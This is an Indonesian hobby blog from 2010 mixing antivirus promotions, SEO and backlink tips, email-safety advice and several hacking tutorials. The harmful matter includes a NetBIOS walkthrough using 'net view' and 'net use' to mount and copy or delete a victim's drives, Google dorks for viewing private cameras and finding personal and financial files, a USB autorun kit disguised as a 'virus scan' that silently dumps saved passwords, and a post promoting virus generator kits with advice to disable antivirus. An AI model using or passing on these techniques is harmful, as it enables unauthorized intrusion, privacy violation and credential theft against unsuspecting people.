Sabtu, 13 November 2010

Download BitDefender Internet Security 2011 + 90 Hari Lisensi Gratis


BitDefender adalah Antivirus populer dan merupakan salah satu Produk Internet Security dari Rumania. BitDefender Internet Security 2011 akan menjaga Anda yang selalu terhubung internet dengan aman, tanpa memperlambat kinerja PC. Produk ini mampu menjaga dari serangan virus, hacker dan spam, sambil memberikan fitur parental kontrol dan perlindungan firewall.

Apa yang baru pada BitDefender Internet Security 2011? Sangat cepat, memberikan 30% lebih cepat dari versi sebelumnya yang menggunakan sumber daya lebih sedikit. Harga Terjangkau, antarmuka Adaptive memungkinkan produk ini untuk digunakan oleh pemula, menengah, dan pengguna yang sudah ahli sekali pun. Firewall yang akan selalu mengawasi semua operasi dalam komputer, laptop mode Negara dan mode game.

Untuk memperlihatkan kehadiran BitDefender Internet Security 2011 baik secara online atau offline, mereka telah bekerja sama dengan situs web lokal dan menawarkan 90 hari lisensi secara gratis. Di situs www.PRwave.ro adalah salah satu website yang menawarkan download gratis BitDefender Internet Security 2011 beserta 90 Hari kunci lisensi gratis. Untuk mendapatkannya Anda harus mendownload installer promosi yang hanya berukuran 1,3 mb dan untuk kemudian menginstalnya secara online (ONLINE INSTALLER). Tidak memerlukan key, program ini setelah diinstal maka secara otomatis akan aktif selama 90 hari.

Download BitDefender Internet Security 2011 Promosi

Kaspersky Internet Security 2011 + 1 Year License Key (Chinese Edition)


Kaspersky Internet Security adalah software solusi keamanan all in one yang menggabungkan Anti-Virus, Anti-Malware, Anti-Rootkit, Anti-Spam, Sandbox, Parental Control, 2-way Firewall, Virtual Keyboard, URL Advisor, dan Pencurian Identitas untuk melindungi Anda dan komputer Anda terhadap segala macam ancaman online dan offline.

Tim Kaspersky Negara Cina untuk waktu yang terbatas menawarkan gratis 1 tahun kunci lisensi untuk single user dari Kaspersky Internet Security 2011 yang biasanya dihargai $ 59,95 saat pembelian. Penawaran ini hanya berlaku untuk 1 bulan dan akan berakhir pada 3 Desember 2011. File kunci lisensi hanya kompatibel dengan program versi Cina.

Untuk mendapatkan kunci lisensi gratis Anda, ikuti langkah berikut:

- Kunjungi Kaspersky Cina Promo Page dan masukkan alamat email Anda dua kali.










Jumat, 27 Agustus 2010

Wifi Hack Ultimate AIO 2010


Setelah beberapa saat mencari tool hacking terbaru, akhirnya nemu juga. Tools ini berisi kumpulan dari beberapa tools yang lumayan bagus.

AIO ini berisi :

Windows Tools 1
WiresHark
AirSnare
Kismet
aircrack
WirelessKeyView
Wifi Monster
NetStumbler
Easy Wifi Radar
SmartSniff
Ettercap
WinPcap
CommView

Jumat, 16 April 2010

Free Backlinks “Cara Gila Untuk Mendapatkan PR 3 dalam 90 Hari”




Mendapatkan tempat pertama dalam search engine adalah impian sekaligus tujuan dari setiap bisnis rumahan yang mempunyai website. Lalu saya terpikirkan cara yang bisa dibilang gila untuk mencapai itu semua dalam waktu singkat Mau tahu gimana? Makanya lanjutkan bacanya!


Banyak sekali pemilik website yang mendapat hambatan untuk menambah baclink karena faktor kurangnya waktu dan uang. Tapi sebenarnya membangun backlink tidaklah bergantung pada waktu ataupun uang. Faktanya ada banyak cara untuk memperbanyak backlink dengan gratis. Gunakan metode yang akan saya sharing dengan Anda ini untuk mendapatkan PR 3 dalam 90 hari bahkan mungkin kurang, yah memang belum tentu sih sih bisa berjalan mulus, tapi yah tidak ada salahnya untuk dicoba.


Pertama yang Anda bisa lakukan adalah mendapatkan free backlink dengan bergabung ke dalam 5 forum yang sesuai dengan niche web/blog Anda. Setelah join ke dalam 5 forum tersebut maka selanjutnya buatlah minimal 10 posting per hari di masing-masing forum. Forum biasanya memiliki PR yang tinggi dan terindeks dengan baik oleh search engine. Lebih dari itu setiap postingmu akan sama dengan backlink berkualitas tinggi selama kamu tidak lupa untuk menaruh URLmu di signaturenya!

Sabtu, 10 April 2010

Akhirnya dapat pagerank

Powered by  MyPagerank.Net
Setelah sekian lama bersusah payah dan berusaha, akhirnya blog ini mendapat pagerank juga. Pertamanya sih nggak nyangka bakal secepat ini dapet pagerank. Awalnya temen yang ngasih tau aku, tapi aku nggak percaya. Trus aku cek sendiri, eehh ternyata bener blogku dapet pagerank1. Buat temen-temen yang blum dapet pagerank tetaplah berusaha biar blog kalian juga bisa dapet pagerank . ..

Kamis, 08 April 2010

Tips untuk menemukan aktivitas yang tidak sah pada E-mail

 

Apakah Anda menduga bahwa account email Anda diserang? Apakah Anda ingin menjaga keamanan total account email Anda dan membuatnya 100% bebas hack?  Yah, Beberapa kali account email kita mungkin sudah mendapat hack dan kita mungkin tidak menyadari hal itu. Kita mungkin percaya bahwa account email kita aman, tetapi dalam kenyataannya kami informasi pribadi dan rahasia mungkin akan jatuh ke tangan orang ketiga.


Berikut adalah beberapa tanda-tanda aktivitas yang tidak sah pada account email.
1. Email baru Anda ditandai sebagai Baca bahkan jika Anda tidak membacanya.
2. Email Anda dipindahkan ke Sampah atau bahkan dihapus secara permanen tanpa pemberitahuan.
3. Email anda sedang diteruskan ke pihak ketiga alamat email (periksa pengaturan Anda-> forwarding).
4. Alamat email sekunder Anda berubah.
Jika kamu menemukan salah satu kegiatan di atas pada account email Anda, maka itu adalah indikasi yang jelas bahwa account email Anda di-hack.

Jumat, 02 April 2010

Bagaimana Melindungi Email dari Hacker

Hari ini di posting ini saya akan mengajarkan anda bagaimana melindungi account email Anda dari hacker. Saat ini saya mendapatkan banyak email di mana sebagian besar orang mengatakan "My Email account hacked tolong bantu ...". Sekarang satu pertanyaan yang muncul dalam pikiran kita adalah: "Apakah begitu mudah untuk hack account email? ATAU Apakah begitu sulit untuk melindungi account email dari hacker? Jawaban tunggal kedua pertanyaan adalah "Tentu saja TIDAK!". Hal ini tidak mudah untuk hack email atau sulit untuk melindungi account email dari hacker.
Jika hal ini terjadi, lalu apa alasan bagi banyak orang kehilangan account mereka?
Jawabannya sangat sederhana. Mereka tidak tahu bagaimana melindungi diri dari hacker! Bahkan sebagian besar orang-orang yang kehilangan account email mereka bukan korban hacking tapi korban dari Trapping. Mereka kehilangan password mereka bukan karena mereka di-hack oleh beberapa pakar hacker tapi mereka tertipu sedemikian rupa sehingga mereka sendiri memberikan password mereka.
 Jika anda terus membaca dan Anda akan tahu ...

NetBIOS HACKING

NetBIOS HACKING ini akan memberitahu anda tentang cara me-remote computer dan memperoleh akses ke  HARD-DISK ATAU PRINTER korban. NetBIOS Hack adalah cara termudah untuk me-remote komputer.
LANGKAH-LANGKAH HACKING NetBIOS:
1. Buka Command Prompt
2. Pada command
prompt gunakan perintah"net view".  (ATAU
ANDA JUGA DAPAT MENGGUNAKAN "NB Scanner" OPSI DI "ALAT
IP "
PERANGKAT LUNAK DENGAN MEMASUKAN RANGE IP ADDRESSS.DENGAN
METODE INI KAMU DAPAT MEN-SCAN BANYAKNYA KOMPUTER YANG CONNECT).
Contoh: C: \> net view \ \ 219.64.55.112
Di atas adalah contoh untuk pengoperasian menggunakan
prompt perintah."Net view" adalah salah satu perintah netbios untuk melihat
sumber daya bersama remote computer. 219.64.55.112" adalah alamat
IP
komputer remote yang akan di-hack melalui Netbios.Kamu
harus menggantinya dengan alamat
IP
computer yang ingin kamu hack.Jika itu berhasil maka
daftar hard disk drive & printer akan muncul. Jika pesan kesalahan ditampilkan,
ulangi langkah no.2 dengan alamat IP yang berbeda.
3. Setelah berhasil, gunakan perintah"net use" di command prompt.Perintah "net use" adalah perintah netbios lain yang memungkinkan untuk remote hack drive atau printer.
Contoh-1:
C: \> net use D: \
\ 219.64.55.112 \ F
Contoh-2:
C: \> net use G: \
\ 219.64.55.112 \ SharedDocs
Contoh-3:
C: \> net use I: \
\ 219.64.55.112 \ Myprint
CATATAN:
Dalam Contoh 1,2 & 3, D:, G: & I: adalah Nama Drive
Jaringan yang akan dibuat pada komputer Anda untuk mengakses komputer remote
hard-disk.
CATATAN:
MEMBERI NAMA DRIVE YANG TIDAK DIGUNAKAN OLEH DRIVE LAINNYA TERMASUK HARD-DISK DRIVE, FLOPPY DRIVE DAN ROM-DRIVE COMPUTER. JIKA ANDA MEMILIKI C: & D: SEBAGAI HARD DRIVE, J: SEBAGAI FLOPPY DIVE DAN E : SEBAGAI CD-DRIVE, BERI M: JIKA ANDA INGIN MENGGUNAKANNYA SEBAGAI SHARED DRIVE DI COMMAND PROMPT.
 F dan"SharedDocs" adalah nama dari komputer remote hard-disk drive yang ingin Anda hack. “Myprint” is the name of remote computer's printer.These are displayed after giving “net use” command. "Myprint" adalah nama dari printer yang ada di komputer remote.Ini akan ditampilkan setelah memberikan perintah"net use".  "219.64.55.112" adalah alamat IP komputer remote yang ingin Anda hack.
4. Setelah berhasil komputer Anda akan memberikan pesan bahwa "The command completed successfully".Setelah Anda mendapatkan pesan di atas Anda hanya satu langkah dari hacking komputer.
Sekarang buka "My Computer" Anda akan melihat "Hard-Disk drive" baru
dengan nama tertentu.Kamu tentu dapat membuka dan mengakses Hard-Drive komputer
remote.Kamu dapat menyalin file, musik, folder dll dari
korban.Kamu dapat menghapus / memodifikasi data hard-drive korban
hanya jika WRITE-ACCESS diaktifkan pada system.Kamu dapat mengakses file \ folder korban dengan cepat melalui "Command Prompt".
CATATAN:
Jika Firewall Komputer Remote Diaktifkan Komputer Anda Tidak Akan Berhasil
Dalam Mendapatkan Akses Untuk Remote Computer Melalui Netbios. NetBIOS Hacking tetap dapat dilakukan Dalam Situasi ini. ( Error Message Apakah Ditampilkan). Jadi Ulangi Langkah no.2-3 Dengan IP Address Berbeda.

Bagaimana menggunakan Google untuk Hacking

Google melayani hampir 80 persen dari seluruh permintaan pencarian di Internet, membuktikan dirinya sebagai mesin pencari paling populer.. Namun Google memungkinkan untuk mencapai bukan hanya sumber informasi yang tersedia untuk publik, tetapi juga memberikan akses ke sebagian dari informasi rahasia yang seharusnya tidak pernah diungkapkan. In this post I will Dalam posting ini saya akan menunjukkan bagaimana cara menggunakan Google untuk memanfaatkan kelemahan keamanan dalam website. Berikut adalah beberapa hack yang dapat diselesaikan menggunakan Google.
1. Hacking Kamera Keamanan
Terdapat banyak kamera keamanan yang digunakan untuk memantau tempat-tempat seperti tempat parkir, kampus, lalu lintas jalan dll yang dapat di-hack menggunakan Google agar Anda dapat melihat gambar yang diambil oleh kamera mereka secara real time. Yang harus Anda lakukan adalah menggunakan permintaan pencarian di Google. Ketik di kotak pencarian Google persis seperti berikut dan tekan enter
          inurl:”viewerframe?mode=motion”
Klik pada salah satu hasil pencarian (Top 5 direkomendasikan) dan Anda akan mendapatkan akses ke kamera hidup yang penuh kontrol. Anda akan melihat sesuatu seperti berikut ini:
Seperti yang anda lihat di atas layar, Anda sekarang memiliki akses ke kamera Live yang bekerja secara real-time.Anda juga dapat memindahkan kamera di seluruh empat arah, melakukan tindakan seperti memperbesar dan memperkecil. Kamera ini memiliki refresh rate yang rendah. Tetapi ada pencarian lain di mana Anda dapat memperoleh akses ke kamera lain yang memiliki refresh rate lebih cepat. Jadi untuk mengaksesnya cukup gunakan permintaan pencarian berikut:
          intitle:”Live View / – AXIS”
Klik pada salah satu hasil pencarian untuk akses kamera yang berbeda. Dengan demikian Anda memiliki Kamera Keamanan yang di-hack menggunakan Google.
2. Hacking Data Pribadi dan Dokumen Rahasia
Menggunakan Google adalah mungkin untuk mendapatkan akses ke repositori email berisi CV dari ratusan orang yang diciptakan ketika melamar pekerjaan mereka. Dokumen-dokumen yang berisi Alamat, Telepon, DOB, Pendidikan, Pengalaman kerja dll dapat ditemukan hanya dalam hitungan detik.
          intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
Anda dapat memperoleh akses ke daftar. Xls (excel dokumen) yang berisi rincian kontak termasuk alamat email kelompok besar orang. Untuk melakukannya ketik perintah berikut di kotak pencarian dan tekan enter.
          filetype:xls inurl:”email.xls” filetype: xls inurl: "email.xls"
Juga mungkin untuk mendapatkan akses ke dokumen berpotensi berisi informasi tentang rekening bank, ringkasan keuangan dan nomor kartu kredit menggunakan permintaan pencarian berikut:
          intitle:index.of finances.xls intitle: index.of finances.xls
3. Hacking Google untuk mendapatkan akses ke Free Stuffs
Pernah bertanya-tanya bagaimana hack Google untuk musik atau ebooks gratis. Nah di sini saya akan memberikan cara untuk melakukan itu. Untuk men-download musik gratis cukup masukkan query berikut pada kotak pencarian google dan tekan enter.
          “?intitle:index.of?mp3 eminem
Sekarang Anda akan mendapatkan akses ke seluruh indeks album eminem dimana Anda dapat men-download lagu-lagu pilihan Anda. Alih-alih Eminem,Anda dapat subtitute nama album favorit Anda. Untuk mencari ebooks yang harus Anda lakukan adalah mengganti "eminem" dengan nama buku favorit Anda. Juga mengganti "mp3" dengan "pdf" atau "zip" atau "rar".
Saya harap Anda menikmati posting ini. Jangan lupa kasih komentar ya. . . .

12 tips untuk menjaga komputer bebas virus

Apakah komputer anda terinfeksi virus? Apakah anda sering mendapatkan pesan kesalahan misterius? Yah ini adalah masalah umum yang dihadapi oleh hampir semua pengguna komputer di seluruh dunia. Ada banyak virus dan worm diluar sana yang dapat menginfeksi komputer Anda. Ada yang tidak berbahaya, tetapi, mereka memiliki kapasitas untuk melakukan sejumlah hal buruk seperti menghapus semua data dari komputer Anda. Namun ada cara untuk mencegah virus jauh dari PC Anda.
 
Berikut adalah 12 tips untuk menjaga komputer bebas virus:
 
 
1. Email adalah salah satu cara umum yang digunakan komputer Anda dapat terserang virus. Sehingga selalu disarankan untuk menjauh dari SPAM. Buka email hanya mereka yang memiliki asal itu dari sumber yang terpercaya seperti yang berasal dari daftar kontak Anda. Jika Anda menggunakan email pribadi Anda sendiri host (selain gmail, yahoo, hotmail dll) maka sangat dianjurkan agar Anda menggunakan baik perangkat lunak anti-spam. Dan akhirnya janagan pernah mengklik link apapun dalam email yang berasal dari sumber yang tidak dipercaya.
   
2. USB flashdisk / pen drive adalah salah satu cara umum yang digunakan virus menyebar dengan cepat. Jadi, selalu lakukan kebiasaan yang baik untuk melakukan scan virus sebelum mengcopy data apapun ke komputer Anda. Jangan pernah double klik FLASHDISK  untuk membukanya. Lebih baik lakukan klik kanan dan pilih opsi "open". Ini adalah cara yang aman untuk membuka flashdisk.
   
3. Hati-hati tentang menggunakan MS Outlook. Pandangan yang lebih rentan terhadap worm dibandingkan program e-mail lainnya, kecuali jika Anda telah menginstall program Anti-Virus. Gunakan Pegasus atau Thunderbird (oleh Mozilla), atau program berbasis web seperti Hotmail atau Yahoo (Di Firefox).
 
4. Seperti kita semua tahu, Internet adalah sumber utama dari semua program berbahaya termasuk virus, worm, trojan dll Bahkan internet memberikan kontribusi terhadap infeksi virus hingga 80%. Jadi di sini adalah tips untuk kebiasaan surfing aman sehingga Anda dapat menangkis infeksi virus sampai tingkat maksimum.
 
Jangan klik jendela pop-up yang mengumumkan bencana tiba-tiba di kota Anda atau mengumumkan bahwa Anda telah memenangkan hadiah per jam. Itu adalah cara untuk menyesatkan pengguna internet dan Anda tidak boleh mempercayai mereka.
 
Anda juga dapat menggunakan pop-up yang secara otomatis memblokir pop-up.
   
5. Sebagian besar dari kita menggunakan mesin pencari seperti Google untuk menemukan apa yang kita cari. Hal ini cukup jelas untuk sebuah situs jahat untuk masuk dalam daftar hasil pencarian. Jadi untuk menghindari orang-orang mengunjungi situs-situs berbahaya tidak terpercaya, Anda dapat men-download dan menginstal AVG LinkScanner yang merupakan freeware. Alat ini bisa menjadi sangat berguna dan akan membantu Anda untuk menjauhi situs-situs berbahaya.
   
6. Menginstal perangkat lunak antivirus yang baik dan tetap diperbarui. Juga melakukan pemindaian sistem penuh secara berkala. Hal ini sangat disarankan agar Anda mengaktifkan fitur update otomatis. Ini adalah tugas yang paling penting untuk melindungi PC Anda dari virues. Jika keamanan PC adalah pilihan pertama Anda maka disarankan bahwa Anda pergi untuk shareware perangkat lunak antivirus yang gratis seperti di atas. Sebagian besar antivirus mendukung fitur Auto-Protect realtime yang menyediakan keamanan untuk PC Anda. Pastikan bahwa fitur ini diaktifkan.
   
7. Menginstal sebuah Antispyware,  program yang mengoperasikan internet melawan malware dan spyware.
   
8. Pernah membuka lampiran email yang berasal dari sumber yang tidak dipercaya. Jika itu adalah gambar, teks atau file suara (lampiran ini berakhir dalam ekstensi. Txt,. Jpeg,. Gif,. Bmp,. Tif,. Mp3,. Htm,. Html, dan. Avi), Anda mungkin aman , tapi masih melakukan scan sebelum pembukaan.
   
9. Jangan gunakan disk orang lain, bahkan dari tempat kerja. Disk dapat terinfeksi virus. Tentu saja, Anda dapat menjalankan scan virus terlebih dahulu untuk mengeceknya.
   
10. Set up Windows Update untuk secara otomatis men-download patch dan upgrade. Hal ini akan memungkinkan komputer Anda untuk secara otomatis mendownload update untuk kedua sistem operasi dan Internet Explorer. Pembaruan ini memperbaiki lubang keamanan di kedua buah perangkat lunak.
  
11. Meskipun Anda men-download file dari situs terpercaya / sumber seperti torrent, warez dll pastikan bahwa Anda menjalankan scan virus sebelum mengeksekusi mereka.
   
12. Dan akhirnya tidak dianjurkan untuk mengunjungi situs-situs yang menampilkan ilegal / barang-barang yang tidak diinginkan seperti patch,serials, warez dan lain-lain karena mereka menyumbang banyak dalam penyebaran virus dan program berbahaya lainnya.

Jangan lupa kasih komentar. . . . 
  


Mengendus Password memakai USB Flashdisk

Seperti yang kita semua tahu, Windows menyimpan sebagian besar password yang digunakan setiap hari, termasuk password instant messenger seperti MSN, Yahoo, AOL, Windows messenger dll. Seiring dengan ini, Windows juga menyimpan password dari Outlook Express, SMTP, POP , account FTP dan password otomatis-lengkap banyak browser seperti IE dan Firefox. Terdapat banyak alat bantu untuk memulihkan passswords ini dari tempat mereka disimpan. Menggunakan alat-alat dan USB flashdisk Anda dapat membuat rootkit Anda sendiri untuk mengendus password dari komputer manapun. Kami membutuhkan alat berikut untuk membuat rootkit kita.
MessenPass : Memulihkan password yang paling populer dari program Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.
PassView mail : Memulihkan password program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup Mail Gratis.
PassView mail juga dapat mengembalikan password account email berbasis web (Hotmail, Yahoo, Gmail), jika Anda menggunakan program yang terkait account tersebut.

Passview IE : IE PassView adalah utility kecil yang mengungkapkan password disimpan oleh browser Internet Explorer. Ini mendukung Internet Explorer 7.0, serta versi internet explorer, v4.0 - v6.0
Protected Storage PassView : Memulihkan semua password disimpan di dalam Penyimpanan Dilindungi, termasuk password AutoComplete Internet Explorer, password situs yang memiliki proteksi password, MSN Explorer Sandi, dan banyak lagi ...
PasswordFox : PasswordFox adalah alat kecil pemulihan sandi yang memungkinkan Anda untuk melihat nama pengguna dan password disimpan oleh Web browser Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah dapat memilih untuk menonton password profil Firefox lainnya.  Untuk setiap entri sandi, informasi berikut ini ditampilkan: Indeks Rekam, Web Site, Nama User, Password, User Nama Field, Password Bidang, dan nama file Signons.
Berikut ini adalah langkah demi langkah untuk menciptakan password hacking toolkit:
CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah.
1. Download semua 5 alat, ekstrak itu dan copy saja executable () exe. File ke USB flashdisk.
 yaitu: Copy files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
2. Buat Notepad baru dan menulis teks berikut ke dalamnya
[autorun]
open=launch.bat

ACTION= Perform a Virus Scan

Simpan Notepad dan rename  dari New Text Document.txt menjadi autorun.inf
Sekarang salin file autorun.inf ke USB flashdisk Anda.

3. Buat Notepad dan copast teks berikut:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt  
Simpan Notepad dan rename file dari New Text Document.txt menjadi launch.bat
Salin file launch.bat juga untuk USB drive Anda.

Sekarang rootkit Anda siap dan Anda siap untuk mengendus password. Anda dapat menggunakan flashdisk pada di komputer manapun untuk mengendus password yang tersimpan.. Hanya ikuti langkah-langkah:

    1. Masukkan flashdisk dan Autorun kan membuat jendela pop-up. (Ini karena, kami telah membuat sebuah flashdisk autorun).
    2. Pada jendela pop-up, pilih opsi pertama (Perform a Virus Scan).
   
3.
Sekarang semua alat password recovery diam-diam akan dijalankan di
latar belakang (Proses ini memakan waktu hampir beberapa detik).
TXT
files.
Password bisa disimpan dalam  file
TXT.

    4. Keluarkan flashdisk dan Anda akan melihat password disimpan dalam file TXT.
Hack ini bekerja pada Windows 2000, XP dan Vista
CATATAN: prosedur ini hanya akan memulihkan password disimpan (jika ada) pada Komputer.

Minggu, 28 Maret 2010

THE HACKER'S UNDERGROUND HANDBOOK

Ingin belajar menjadi hacker tapi tidak tahu memulai dari mana? Buku ini adalah salah satu jawabanya. The Hacker's Underground Handbook mengulas berbagai teknik hacking yang populer digunakan. Dari teknik hacking sederhana sampai pada teknik intermediate dan advanced. Disusun oleh David Melnichuk, pendiri blog yang membahas hacking dan keamanan. Anda dapat mengunjungi blognya di http://mrcracker.com.


Daftar isi buku The Hacker's Underground Handbook :

Pendahuluan
- Apa itu Hacker?

- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman

- Perlukah mempelajarinya?

- Dimana saya harus memulai?

- Cara belajar terbaik

Password

- Password Cracking

- Phising
- Program-program pencuri password


Network Hacking
- Foot Printing
- Port Scanning

- Banner Grabbing

- Searching the Vulnerabilities

- Penetrating

Wirelless Hacking

- Scanning wireless network

- Cracking WEP
- Packet Sniffing


Windows Hacking

- NetBios

- Cracking windows password


Malware

- Definisi
- Prorat


Web Hacking

- Cross site scripting

- Remote file inclusion

- Local file inclusion



Virus Generator



Mungkin anda berfikir membuat Virus sangat sulit sekali. Membutuhkan keahlian coding atau paling tidak menguasai salah satu bahasa pemrograman windows populer seperti VB atau C++. Namun tidak demikian jika anda memiliki Virus Generator. Dengan Virus Generator, pembuatan virus dapat dilakukan secepat membuat mie instan. Tinggal klik dan klik, maka sebuah virus dengan mudahnya tercipta.
rus generator banyak tersebar di dengan beragam pilihan. Anda bisa mencarinya di forum-forum atau situs bawah tanah. Meskipun virus yang diciptakan dapat dibuah dengan mudah, namun anda tidak bisa meremehkan ketangguhanya. Beberapa virus terkenal di yang banyak menyebar di Indonesia atau di dunia banyak yang dibuat dengan virus generator ini.

Berikut beberapa virus generator yang cukup populer yang dapat anda coba untuk membuat virus dengan mudah:

1. In Shadow Batch Virus Generator


Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.
- Mematikan komputer otomatis, mendownload files otomatis, dll




2. JPS Virus Maker


Kemampuan:
- Mematikan regedit, task manager, MS Config dan beragam aplikasi yang membahayakan kelangsungan hidup virus.
- Menonaktifkan anti virus, wordpad, notepad, command prompt, dll
- Menghiden drive, file, dan tombol-tombol penting seperti Shutdown, restart, logoff, dll
- Mematikan monitor, memainkan mouser, membuka CD drive, dll





 



3. TeraBIT Virus Maker




Kemampuan:
Memiliki beragam kemampuan seperti dua virus generator di atas.



NB: Matikan antivirus saat ingin memakai software ini karena terdeteksi sebagai trojan. . . . . .

Selamat Mencoba

Repair Internet Explorer

Repair IE is a free but powerful repair utility for Internet Explorer, with Repair IE you can safely clean, repair and optimize the Internet Explorer registry with a few simple mouse clicks! By using this repair tool regularly and fixing registry errors your IE browser should not only be more stable but it will also help improve your IE browser performance.
There are times when Internet Explorer will start crashing or producing errors for no apparent reason, especially if your windows system has been infected with spyware, malware and viruses that have damaged your computer, you may find it necessary to fix Internet Explorer from time to time, once the viruses has been removed, you can proceed with a repair of IE.
This program is suitable for Windows 98/ME/XP/Vista systems.




What are Repair IE can do for you?
  • Open Favorites in a new window
  • Disable the Internet Explorer HTML Source Editor Check
  • Change the Download Location for ActiveX Files
  • Open TIF Images with Internet Explorer
  • Show My Pictures Toolbar in Internet Explorer
  • Force Plain Text Format in Internet Explorer
  • Remove Windows Messenger from Internet Explorer
  • Open Internet Explorer Shortcuts in a New Window
  • Launch Browser Windows in a Separate Process
  • Specify the Location of the Online Support Site
  • Control Internet Explorer Error Reporting
  • Disable Internet Explorer Download Notification
  • Specify the Default Internet Explorer Download Directory
  • Use an Alternate Source Viewer with Internet Explorer
  • Change the Auto Complete Mode
  • Disable the Internet Explorer Script Debugger
  • Change Links Folder Name on Toolbar
  • Hide the Internet Explorer Icon
  • Disable Internet Access
  • Use System-Wide Proxy Settings
  • Change the Internet Explorer User Agent String
  • Change the Branded User Agent String
  • Change the Number of Simultaneous HTTP Sessions
  • Internet Explorer FTP Mode
  • Connect to Unicode Addresses with Internet Explorer
  • Change the Default Keep-Alive Time-Out in Internet Explorer
  • Disable Internet Explorer Automatic Proxy Caching
  • Search from the Address Bar in Internet Explorer
  • Change the Default Internet Explorer Search Page
  • Change the Internet Explorer Search Engine
  • Disable the Custom Search Page in Internet Explorer
  • Empty Temporary Internet Files on Exit
  • Internet Explorer Toolbar Restrictions
  • Disable the Ability to Customize Toolbars
  • Restrict Web Sites from Installing Software
  • Disable File Download in Internet Explorer
  • Remove the Option to Change or Hide Toolbars
  • Clear the Windows System HOSTS file
  • Internet Explorer Restrictions
  • Internet Explorer Control Panel Restrictions (Part 1)
  • Internet Explorer Control Panel Restrictions (Part 2)
  • Disable Password Caching in Internet Explorer
  • Disable Caching of Secure Web Pages
  • Use System-based Internet Restrictions
  • Disable Save As Web Page Complete
  • Disable Access to File URLs in Internet Explorer
  • Change the Internet Explorer Window Title
  • Add a Background Bitmap to the Internet Explorer Toolbar
  • Show Friendly HTTP Error Messages
  • Automatically Resize Images in Internet Explorer
  • Use Smooth Scrolling in Internet Explorer
  • Disable the Go Button in Internet Explorer
  • Remove Selected Internet Explorer Toolbar Buttons
  • Show "Shortcut to" Label on Internet Explorer Links
  • Disable Homepage Setting
  • Remove Extending Entries to The Standard Context Menus
  • Disables the Right-Click Shortcut Menu
  • Remove the Content Advisor and Ratings Password
  • Change the Default Page URL
  • Change the Default Search URL
  • Change the Search Bar URL
  • Change the Search Page URL
  • Change the Search Migrated Default Name
  • Change the Search Migrated Default URL
  • Change the Start Page URL
  • Enable Internet Explorer as the default browser
  • Clear the Internet Explorer Typed Address History


Disclaimer

RepairIE will modify some registry settings for Internet Explorer tweaking, modifying the Internet Explorer registry can cause serious problems that may require you to reinstall your operating system. We cannot guarantee that problems resulting from modifications to the registry can be solved. Use this free software at your own risk.

The software is provided "AS IS" without any warranty, either expressed or implied. The author will not be liable for any special, incidental, consequential or indirect damages due to loss of data or any other reason.

Sabtu, 27 Maret 2010

Daftar Blog Berpagerank Tinggi

Bagi teman-teman yang ingin mencari backlink gratis dari situs/blog berpagerank tinggi dan juga dofollow, ini saya punya daftarnya, daftar ini sih hasil dari teman-teman, jadi saya mohon untuk copy-paste artikelnya buat nambah-nambah postingan. nih daftar blog berpagerank tinggi.

blog indonesia
Pagerank 6
http://harry.sufehmi.com

Pagerank 5
http://www.gareng.net

Pagerank 4
http://ningtyasindri.blogspot.com
http://penyuonline.info
http://www.sumintar.com

Pagerank 3
http://www.blogguebo.com
http://fahry.com
http://www.penulislepas.com
http://wawanwae.blogspot.com
http://www.dexno.com
http://semarangreview.blogspot.com
http://oktasihotang.com
http://www.lutfi-rifai.web.id
http://dhimas.web.id
http://www.arhan.web.id
http://www.permanaj.net
http://idebisnisusaha.com
http://kolomkesehatan.blogspot.com
http://www.lutfigoblog.com
http://nichpakaich.net
http://bernard-notes.com
http://awan.wibawa.net
http://danasimpleman.blogspot.com
http://brahmasta.net
http://www.anomtejo.web.id
http://sebuaharti.blogspot.com
http://blog.mriza.web.id
http://utchanovsky.com

Pagerank 2
http://negerihijau.blogspot.com
http://cariuangtambahan.blogspot.com
http://hapebewe.blogspot.com
http://www.bintorobisnis.com
http://klikfan.com
http://www.hilmanpribadi.com
http://tera.sirumah.com
http://www.promobebas.com
http://www.tantan-hilyatana.net
http://wanadamsyah.blogspot.com
http://gudangmusik.blogspot.com
http://harry99.info
http://www.dewahyoe.org
http://sawali.info
http://www.jimmysun.net
http://www.brokencode.biz
http://ristizona.blogspot.com

direktori dofollow berpagerank tinggi
* http://ma.gnolia.com/ PageRank 6
* http://www.mister-wong.com/register/ PageRank 6
* http://www.bunrui.info/ PageRank 5
* http://tweako.com/ PageRank 5
* http://www.indianpad.com/ PageRank 5
* http://www.bibsonomy.org/ PageRank 5
* http://www.addsitelink.com/ PageRank 4
* http://www.linkaddurl.com/ PageRank 4
* http://www.dofollowblogs.com/ PageRank 4
* http://socialogs.com/ PageRank 4
* http://www.bmaccess.net/ PageRank 4

pagerank diatas sih bisa berubah sewaktu-waktu, yup, semoga bermanfaat.( ^_^)
Semoga bermanfaat . . 

Daftar Langsung Dapat $10

Get cash from your website. Sign up as affiliate.

Waktu gue iseng-iseng buka facebook, ternyata ada info dari temen yang ngasih tau ada website yang ngasih duit $10 cuma dengan daftar aja ke web itu. Seru nggak tuh . . . . .!!!

Klo tertarik daftar langsung aja DISINI
Caranya mudah banget kok, kita tinggal isi nama, alamat email, ama alamat web/blog kita. Trus buka aja email kamu ntar disitu bakalan ada username dan password kamu. Tinggal Login deh. . . . .
